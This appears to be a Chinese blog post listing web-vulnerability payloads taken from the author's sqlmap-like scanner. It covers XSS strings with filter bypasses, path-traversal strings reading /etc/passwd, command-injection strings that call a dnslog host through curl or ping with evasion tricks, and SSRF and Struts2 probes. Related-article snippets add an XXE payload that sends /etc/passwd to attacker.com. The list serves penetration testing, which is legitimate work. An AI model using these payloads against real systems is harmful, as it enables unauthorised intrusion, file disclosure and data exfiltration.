WEB漏洞测试payload整理

最新推荐文章于 2025-05-05 15:14:44 发布
转载 最新推荐文章于 2025-05-05 15:14:44 发布 · 1.6k 阅读 · 6

本文整理了常用的Web漏洞测试Payload,包括XSS、命令执行、SSRF等漏洞的测试代码,适用于不同类型的Web应用安全测试场景。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

常用web漏洞测试的payload整理,把写的一个类sqlmap的web安全漏洞测试工具的Payload整理下来,供大家测试时参考。

[反射型xss]

[在html形成]

" '><script>document.title="[random]";</script>
<script>document.title="[random]";</script>
<svg onload=document.title="[random]";>

[在js形成]

document.title="[random]";//
;document.title="[random]";//
";document.title="[random]";
';document.title="[random]";
");document.title="[random]";
');document.title="[random]";

[在html属性形成(img)]

888" onload=document.title="[random]" a="
888' onload=document.title="[random]" a='
888 onload=document.title="[random]" 

[存储型xss]
[通用payload]
测试环境,需要在触发的地方查看payload显示情况

<script>alert(/StoredXssByScriptTag/);</script>
"'><script>alert(/StoredXssByScriptTagBypass);</script>
[Bypass on Event] [事件型绕过]
<img src=1 onerror=alert(/StoredXssByImgTag/)>  #一般富文本不会过滤img标签
[Bypass pseudo protocol] [伪协议绕过]
<iframe src=javascript:prompt(/StoredXssByIframeTag/);></iframe>
<object data=data:text/html;base64,PHNjcmlwdD5wcm9tcHQoL1N0b3JlZFhzc0J5T2JqZWN0VGFnLyk7PC9zY3JpcHQ+></object>
[Bypass html5 tag] [html5标签绕过]
<svg onload=prompt(/StoredXssBySvgTag/)>
<embed src=javascript:alert(/StoredXssByEmbedTag/);>
[Bypass html or js encode] [js编码,html编码,十进制编码绕过等]
<embed src=javas&#99;r&#105;pt:alert(/StoredXssByEmbedTagAndHtmlEncode/);>
<video><source onerror=alert(String.fromCharCode(47,83,116,111,114,101,100,88,115,115,98,121,86,105,100,101,111,84,97,103,65,110,100,83,116,114,105,110,103,69,110,99,111,100,101,47))>
<script/src=data:text/j\141v\141script,\u0061%6C%65%72%74(/StoredXssbyScriptTagAndJSEncode/)></script>
如果进行盲测可以根据xss平台地址替换相应的js触发代码
"><script src=http://myxss.net/xxxxxx></script>

[静态文件读取]
[常规检测]

/../../../../../../../../../../../etc/passwd
/../../../../../../../../../../../etc/hosts     
/../../../../../../../C:/Windows/system.ini [windows]


[伪造绕过]

/././././././././././././././././././././././././../../../../../../../../etc/passwd      
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd 
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd     
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/hosts 


[后缀绕过]

/../../../../../../../../../../../etc/passwd#
/../../../../../../../../../../../etc/passwd%00
/../../../../../../../../../../../etc/passwd#.jpg
/../../../../../../../../../../../etc/passwd%00.jpg
/../../../../../../../../../../../etc/passwd#.html
/../../../../../../../../../../../etc/passwd%00.html
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd#
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd#.jpg
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd#.html
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00.jpg
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00.html


[命令执行漏洞]


[常规检测]

;curl [random].test.dnslog.link
 | curl [random].test.dnslog.link
 | ping -n 2 [random].test.dnslog.link [Windows]
 | ping -c 2 [random].test.dnslog.link  [Linux]


[绕过检测]

;curl [random].test.dnslog.link#
 | curl [random].test.dnslog.link#
%20|%20curl%20[random].test.dnslog.link
%20|%20curl%20[random].test.dnslog.link#
%20|%20ping%20-n%202%20[random].test.dnslog.link
%20|%20ping%20-c%202%20[random].test.dnslog.link#
a=p;b=ing;c=c;d=2;$a$b -$c $d [random].test.dnslog.link
a=c;b=url;$a$b [random].test.dnslog.link#
${IFS}|${IFS}curl${IFS}[random].test.dnslog.link
${IFS}|${IFS}ping${IFS}-c${IFS}2${IFS}[random].test.dnslog.link
a=p;b=ing;c=c;d=2;$a$b{IFS}-$c{IFS}$d{IFS}[random].test.dnslog.link
a=c;b=url;$a$b{IFS}[random].test.dnslog.link#


[ssrf漏洞]

http://[random].test.dnslog.link/


[strust2命令执行]

?redirect:http://[random].test.dnslog.link/%25{3*4}

Web安全Payload的探索与Kali渗透测试框架-msf
李响
03-16 1153
文章目录1 MSF基本介绍2 将数据库与MSF关联3 POC&&EXP4 Payload5 bundler和msf版本不匹配问题6 msf使用步骤6.1 查win7 和 kali ip地址6.2 运行msfcon 自动补全6.3 逐步运行msf各个模块 1 MSF基本介绍 metasploit 是一个开源框架,这个框架用来做渗透测试,其 msf 是由多个不同的模块组成的。可以在 k...
XSS测试payload
09-19
XSS测试payload,收集了简单的XSS测试用例,较具有实用性。
SSRF(服务器端请求伪造)攻击详解与防御指南
最新发布
2201_75445650的博客
05-05 1220
SSRF(Server-Side Request Forgery,服务器端请求伪造) 是一种由攻击者构造请求,诱使服务端发起内部或外部请求的攻击方式。攻击目标通常是 内网服务、云元数据接口、其他受信主机。
web漏洞之payload
hdquan321的博客
04-30 8977
什么是payloadpayload又称为攻击载荷,主要是用来建立目标机与攻击机稳定连接的,可返回shell,也可以进行程序注入等。 也有人把payloads称 为shellcode。 Shellcode实际是一段代码(也可以是填充数据),是用来发送到服务器利用特定漏洞的代码,一般可以获取权限。另外,Shellcode一般是作为数据发送给受攻击服务器的。 payload有几种类型: 1、sing...
测试点的payload
HoAd'blog
08-17 358
一些测试点的payload,后续继续补充电子邮件地址图片名字 电子邮件地址 以下payload都是有效的电子邮件地址 XSS(跨站脚本): test+(<script>alert(0)</script>)@example.comtest@example(<script>alert(0)</script>).com"<script>alert(0)</script>"@example.com 模板注入: "<%=7 * 7 %&g
xss|常见payload
时光
03-23 708
7.referer UserAgent Cookie等地方也可以进行xss测试。2.绕过htmlspecialchars方法,先闭合输入,再使用事件来绕过。3.<> script onclick被过滤,用a标签绕过。6.使用type=text来显示被隐藏的标签,再用事件。9.用这些字符来测试哪些被过滤了。5.Unicode编码绕过。10.空格用回车编码代替。
常见Web漏洞整理
TH_DL的博客
07-14 897
对常见的Web漏洞的基本原理,利用,防御的整理,包括XXS、CSRF、注入攻击、SSRF、文件上传、文件包含。
Web安全 EmpireCMS漏洞常见漏洞分析及复现_cms代码执行漏洞
2401_86951451的博客
09-12 1465
如果有waf拦截web流量就走加密传输,如果始终连接不上就要一步步的进行排查。这里可以在一句话密码后面输出一个echo 123,通过是否有回显来探测哪一步没有完善导致连接不成功。
安全测试工程师】超实用的Web渗透测试学习路线~
weixin_44433834的博客
08-02 3581
前言 本文整理的学习路线,清晰明了,重点分明,能快速上手实践,相信想学的同学们都能轻松学完。都是干货啦,先收藏⭐再看吧。本文偏基础能让萌新们快速摸到***测试的门道,少走弯路,也能让正在学习的小伙伴们查漏补缺,也欢迎大佬们在评论区指正错误~ 先上脑图 其实安全测试需要的知识面是非常广的,但跟着教程有重点地学习还是能很快理清思路上手测试的,后续可以自己深入研究,吃透这些领域的知识。 首先我们要了解什么是***测试。 我们知道业务功能、逻辑的测试有黑盒测试和白盒测试,前者把程序看作一个不能打开的黑盒子,在完
给出bwapp靶场SQL Injection (GET/Search)关卡的漏洞原理和三个级别的测试思路和payload,用人话整理答案回答
03-15
好的,我现在需要处理用户关于bWAPP中SQL注入GET/Search关卡的漏洞解析、不同安全级别的测试方法和payload示例的问题。首先,我得回忆一下bWAPP的基本情况,它是一个故意设计有漏洞的Web应用,用于安全演练。SQL注入...
探索Payloads:一款强大且灵活的安全测试工具
gitblog_00089的博客
03-22 472
探索Payloads:一款强大且灵活的安全测试工具 在网络安全领域,漏洞探测和安全测试是确保系统安全的重要环节。今天,我要向大家介绍一个开源项目——,这是一个精心设计的工具库,专门用于构建、管理和分享各种安全测试载荷。让我们一起深入了解一下它的功能、技术特点以及为何它值得你尝试。 项目简介 Payloads是一个由Python编写的项目,旨在为渗透测试者和安全研究人员提供一个集成的平台,以生成、搜...
timertask run函数未执行_学生会私房菜【20200707期】Wordpress 4.6 任意命令执行漏洞...
weixin_39604350的博客
11-24 1392
学生会私房菜学生会私房菜是通过学生会信箱收集同学们的来稿,挑选其中的优质文档,不定期进行文档推送的主题。本期文档内容为:《Wordpress 4.6 任意命令执行漏洞》作者介绍:ATao闽江学院信息安全专业学生,目前在国科学院福州基地学习安全课程,同时在学生会安全团队进行安全攻防演练,本次主要分享平时在安全中可能会用的上的一些内容。0x00简介WordPress是使用PHP语言开发的博客...
漏洞payload 靶机_hackme:2 靶机攻略
weixin_42354108的博客
01-16 1163
原标题:hackme:2 靶机攻略 0x01 背景:hackme:2是vulnhub上的一个medium难度的CTF靶机,难度适中、内容丰富,贴近实战。而且没有太多的脑洞,适合安全工作者们用来练习渗透测试,然而唯一的缺憾是目前没有公开的攻略,因此把个人的通关过程记录于此,作为攻略分享给大家!0x02 技术关键词:SQL注入、WAF Bypass、模糊测试、文件上传、suid提权0x03 靶机发现与...
网络安全领域常说的payload
weixin_30633405的博客
10-18 2451
之前参加过一次网络安全讲座,讲师经常提到payload,好奇到底什么是payloadpayload,翻译过来是有效载荷 通常在传输数据时,为了使数据传输更可靠,要把原始数据分批传输,并且在每一批数据的头和尾都加上一定的辅助信息,比如数据量的大小、校验位等,这样就相当于给已经分批的原始数据加一些外套,这些外套起标示作用,使得原始数据不易丢失,一批数据加上“外套”就形成了传输通道的基本传输单元...
WEB安全渗透测试》(20)payload攻击载荷
午夜安全
08-23 9593
WEB安全渗透测试》(20)payload攻击载荷 payload称为攻击载荷,主要用于建立目标机与攻击机之间的稳定连接,并返回一个shell,也可以进行程序注入等。(1)singles(独立载荷)独立载荷,可直接植入目标系统并执行相应的程序,如:shell_bind_tcp。(2)stagers(传输器载荷)传输器载荷,用于目标机与攻击机之间建立稳定的网络连接,与stages(传输体载荷)配合攻击。通常该种载荷体积都非常小,可以在漏洞利用后,方便进行注入,这类载荷功能都非常相似...
MetaSploit常用漏洞payload网址
一杯咖啡的渗透记忆
05-21 1026
http://www.rapid7.com/db/searchhttp://www.exploit-db.com/search/http://osvdb.org/search/advsearch
python渗透工具编写学习笔记:9、web漏洞检测与利用脚本
weixin_49511463的博客
12-24 4384
python编写SQL注入、XXS、CSRF、文件包含、上传漏洞检测与利用脚本以及漏洞防护框架
web xxe测试实例
03-08
<think>好的,用户需要关于Web应用中XXE漏洞的测试示例、示例代码和检测方法。首先,我要回忆一下XXE的基本概念和常见利用方式。根据提供的引用内容,XXE漏洞主要是因为XML解析器未禁用外部实体引用,导致攻击者可以读取文件、执行命令等。 用户需要具体的测试实例和示例代码,所以我需要整理几个典型的场景,比如有回显和无回显的情况。对于有回显的情况,通常可以通过直接注入外部实体来读取系统文件,比如/etc/passwd。示例代码可能包括构造带有外部实体的XML,并展示如何通过服务器响应获取数据。 然后是检测方法,用户可能需要知道如何手动测试或者使用工具。手动检测可以通过修改Content-Type为XML,或者尝试插入实体声明。工具方面,比如Burp Suite的Scanner或者OWASP ZAP可以自动检测,但手动验证也很重要。 另外,用户可能对不同的编程环境感兴趣,比如PHP和Java。根据引用内容,虽然示例用PHP环境,但漏洞利用与语言无关,所以需要说明这一点。可能需要提到PHP的示例代码,如引用3中的靶场,以及Java中的常见配置问题,比如禁用DTD。 还需要考虑无回显的情况,这时候可能需要使用参数实体和外部服务器来捕获数据。比如通过DNS查询或HTTP请求将数据外带。示例代码需要展示如何构造OOB(带外)攻击的XML。 检测方法部分,要分步骤说明,比如检查XML解析配置、测试实体注入、监控外部请求等。同时,引用中的信息,如引用4提到的危害,可以强调检测的重要性。 最后,生成相关问题时要围绕用户可能的后续疑问,比如漏洞修复、不同语言的差异、自动化工具等。确保问题覆盖用户可能深入的方向。 需要确保回答中的示例代码正确使用$...$和$$...$$格式,并遵循LaTeX语法。同时,引用标识要正确对应,比如引用1、2、3、4的位置是否准确。 现在整理结构:先介绍XXE漏洞,然后分有回显和无回显的测试示例,给出代码片段,接着说明检测方法,最后相关问题。需要确保每个部分都有引用支持,比如引用4中的基础知识,引用2中的Java环境说明,引用3中的靶场示例。 检查是否有遗漏点,比如PHP和Java的处理差异,虽然利用相同但配置不同,可能需要提到。另外,检测方法中的工具和手动步骤都要涵盖。确保回答清晰,步骤详细,用户能按照指导进行测试。</think>### Web应用XXE漏洞测试示例与检测方法 --- #### 一、XXE漏洞测试实例 1. **有回显的XXE利用(文件读取)** 构造包含外部实体的XML请求,尝试读取服务器文件(如`/etc/passwd`): ```xml <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <user> <name>&xxe;</name> </user> ``` - **触发场景**:若服务器返回内容中包含文件内容,则存在漏洞[^4]。 - **示例靶场**:访问`http://127.0.0.1/xxe-lab/php_xxe/`(PHP环境)并提交上述Payload[^3]。 2. **无回显的XXE利用(带外数据外传)** 通过参数实体和外部服务器接收数据: ```xml <?xml version="1.0"?> <!DOCTYPE foo [ <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd"> %dtd; ]> <user></user> ``` - **外部DTD文件(evil.dtd)**: ```xml <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % oob "<!ENTITY % exfil SYSTEM 'http://attacker.com/?data=%file;'>"> %oob; %exfil; ``` - **检测方法**:监控攻击者服务器的访问日志,查看是否收到文件内容[^2]。 --- #### 二、示例代码(PHP靶场) 假设目标接口接收XML输入: ```php // 漏洞代码示例(未禁用外部实体) $xml = file_get_contents('php://input'); $dom = new DOMDocument(); $dom->loadXML($xml); echo $dom->getElementsByTagName('name')->item(0)->nodeValue; ``` **测试Payload**: ```http POST /vuln_endpoint HTTP/1.1 Content-Type: application/xml <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <user><name>&xxe;</name></user> ``` --- #### 三、检测方法 1. **手动检测** - **步骤1**:修改请求的`Content-Type`为`application/xml`,插入实体声明。 - **步骤2**:尝试读取系统文件或触发DNS/HTTP请求(如`file:///etc/passwd`或`http://attacker.com`)。 - **步骤3**:观察响应是否包含文件内容或外部服务器是否收到请求[^1]。 2. **工具检测** - **Burp Suite**:使用`Scanner`模块自动检测XXE漏洞。 - **OWASP ZAP**:通过主动扫描识别XML解析风险。 - **XXEinjector**:自动化工具,支持带外数据测试。 3. **配置检查** - 禁用XML解析器的外部实体(如PHP中设置`libxml_disable_entity_loader(true)`)。 - 使用白名单验证输入数据格式。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值